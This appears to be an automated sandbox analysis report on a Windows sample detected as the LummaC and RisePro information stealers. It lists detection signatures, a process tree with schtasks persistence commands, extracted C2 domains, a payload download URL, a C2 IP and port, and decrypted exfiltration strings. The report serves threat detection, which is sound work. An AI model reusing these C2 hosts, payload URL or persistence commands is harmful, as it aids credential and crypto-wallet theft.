Edit tour

Windows Analysis Report
tMO4FVIc9l.exe

Overview

General Information

Sample name:	tMO4FVIc9l.exe renamed because original name is a hash value
Original sample name:	6bc7f3c7927f5fc13a4410f1770c2dfe.exe
Analysis ID:	1446871
MD5:	6bc7f3c7927f5fc13a4410f1770c2dfe
SHA1:	4fd9306a40681e1f881168644f991c30824b02cc
SHA256:	c6ec11a31d4c28480f4ee3cc744792e12d7919cfffff5b7ca86649c904b7abda
Tags:	exeRiseProStealer
Infos:

Detection

LummaC, RisePro Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected LummaC Stealer

Yara detected RisePro Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

tMO4FVIc9l.exe (PID: 3108 cmdline: "C:\Users\user\Desktop\tMO4FVIc9l.exe" MD5: 6BC7F3C7927F5FC13A4410F1770C2DFE)

schtasks.exe (PID: 2012 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5832 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xq6J5KlULX6jlR3rET0T.exe (PID: 1096 cmdline: "C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)

RegAsm.exe (PID: 6472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 1132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 2688 MD5: C31336C1EFC2CCB44B4326EA793040F2)

MSIUpdaterV202.exe (PID: 5044 cmdline: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe MD5: F14B083F53FEFD0071732BF5C0DCD6FA)

RegAsm.exe (PID: 500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

MSIUpdaterV202.exe (PID: 5012 cmdline: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe MD5: F14B083F53FEFD0071732BF5C0DCD6FA)

RegAsm.exe (PID: 4340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

AdobeUpdaterV202.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)

AdobeUpdaterV202.exe (PID: 6888 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)

RegAsm.exe (PID: 5920 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

AdobeUpdaterV202.exe (PID: 1924 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)

AdobeUpdaterV202.exe (PID: 2852 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)

RegAsm.exe (PID: 3160 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["roomabolishsnifftwk.shop", "civilianurinedtsraov.shop", "stalfbaclcalorieeis.shop", "employhabragaomlsp.shop", "femininiespywageg.shop", "averageaattractiionsl.shop", "buttockdecarderwiso.shop", "museumtespaceorsp.shop", "employhabragaomlsp.shop"], "Build id": "H8NgCl--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zip	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2155682026.0000000006044000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: tMO4FVIc9l.exe PID: 3108	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: tMO4FVIc9l.exe PID: 3108	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6472	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6472	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 500	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 500	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5920	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5920	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 9 entries

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\tMO4FVIc9l.exe, ProcessId: 3108, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7

Snort Signatures

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:10.983112
SID:	2052775
Source Port:	49732
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:20.530627
SID:	2052775
Source Port:	49745
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:23.772643
SID:	2052775
Source Port:	49751
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:22.518638
SID:	2052775
Source Port:	49747
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:12.085167
SID:	2052775
Source Port:	49734
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:05.782799
SID:	2052775
Source Port:	49721
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:15.606325
SID:	2052775
Source Port:	49740
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:14.912811
SID:	2052775
Source Port:	49739
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:27.200612
SID:	2052775
Source Port:	49753
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN RisePro TCP Heartbeat Packet - Source IP: 192.168.2.6 - Destination IP: 5.42.65.116

Timestamp:	05/24/24-00:21:54.577369
SID:	2049060
Source Port:	49710
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:09.677486
SID:	2052775
Source Port:	49726
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:13.704960
SID:	2052775
Source Port:	49736
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:04.255674
SID:	2052775
Source Port:	49717
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:28.906409
SID:	2052775
Source Port:	49755
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:16.187312
SID:	2052775
Source Port:	49742
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:03.520068
SID:	2052775
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.6 - Destination IP: 5.42.65.116

Timestamp:	05/24/24-00:22:01.482311
SID:	2046269
Source Port:	49710
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (External IP) - Source IP: 5.42.65.116 - Destination IP: 192.168.2.6

Timestamp:	05/24/24-00:21:55.315556
SID:	2046267
Source Port:	50500
Destination Port:	49710
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 5.42.65.116 - Destination IP: 192.168.2.6

Timestamp:	05/24/24-00:21:55.095747
SID:	2046266
Source Port:	50500
Destination Port:	49710
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:06.685867
SID:	2052775
Source Port:	49723
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:23.759277
SID:	2052775
Source Port:	49750
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:17.527410
SID:	2052775
Source Port:	49744
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:32.208689
SID:	2052775
Source Port:	49757
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (employhabragaomlsp .shop) - Source IP: 192.168.2.6 - Destination IP: 1.1.1.1

Timestamp:	05/24/24-00:22:03.499118
SID:	2052761
Source Port:	65237
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:05.249068
SID:	2052775
Source Port:	49720
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:25.432173
SID:	2052775
Source Port:	49752
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:14.645862
SID:	2052775
Source Port:	49738
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:05.172883
SID:	2052775
Source Port:	49719
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:21.615908
SID:	2052775
Source Port:	49746
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:15.797814
SID:	2052775
Source Port:	49741
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:04.759337
SID:	2052775
Source Port:	49718
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:14.452009
SID:	2052775
Source Port:	49737
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:06.291359
SID:	2052775
Source Port:	49722
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:27.489896
SID:	2052775
Source Port:	49754
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:09.774730
SID:	2052775
Source Port:	49729
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:06.824727
SID:	2052775
Source Port:	49724
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:22.849766
SID:	2052775
Source Port:	49748
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:30.450870
SID:	2052775
Source Port:	49756
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:04.185732
SID:	2052775
Source Port:	49716
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	05/24/24-00:22:17.199190
SID:	2052775
Source Port:	49743
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://5.42.65.116/lumma2305.exej	Avira URL Cloud: Label: phishing
Source: http://5.42.65.116/lumma2305.exe~	Avira URL Cloud: Label: phishing
Source: http://5.42.65.116/lumma2305.exeMeleonCH	Avira URL Cloud: Label: phishing
Source: http://5.42.65.116/lumma2305.exeaTTm	Avira URL Cloud: Label: phishing
Source: http://5.42.65.116/lumma2305.exeEWPz	Avira URL Cloud: Label: phishing
Source: http://5.42.65.116/lumma2305.exe	Avira URL Cloud: Label: phishing
Source: http://5.42.65.116/lumma2305.exeto.de	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1317026

Found malware configuration

Source: 9.2.MSIUpdaterV202.exe.bf0000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["roomabolishsnifftwk.shop", "civilianurinedtsraov.shop", "stalfbaclcalorieeis.shop", "employhabragaomlsp.shop", "femininiespywageg.shop", "averageaattractiionsl.shop", "buttockdecarderwiso.shop", "museumtespaceorsp.shop", "employhabragaomlsp.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: tMO4FVIc9l.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: tMO4FVIc9l.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: roomabolishsnifftwk.shop
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: civilianurinedtsraov.shop
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: stalfbaclcalorieeis.shop
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: employhabragaomlsp.shop
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: femininiespywageg.shop
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: averageaattractiionsl.shop
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: buttockdecarderwiso.shop
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: museumtespaceorsp.shop
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: employhabragaomlsp.shop
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: - Screen Resoluton:
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: Workgroup: -
Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00414F19 CryptUnprotectData,

12_2_00414F19

Source: tMO4FVIc9l.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
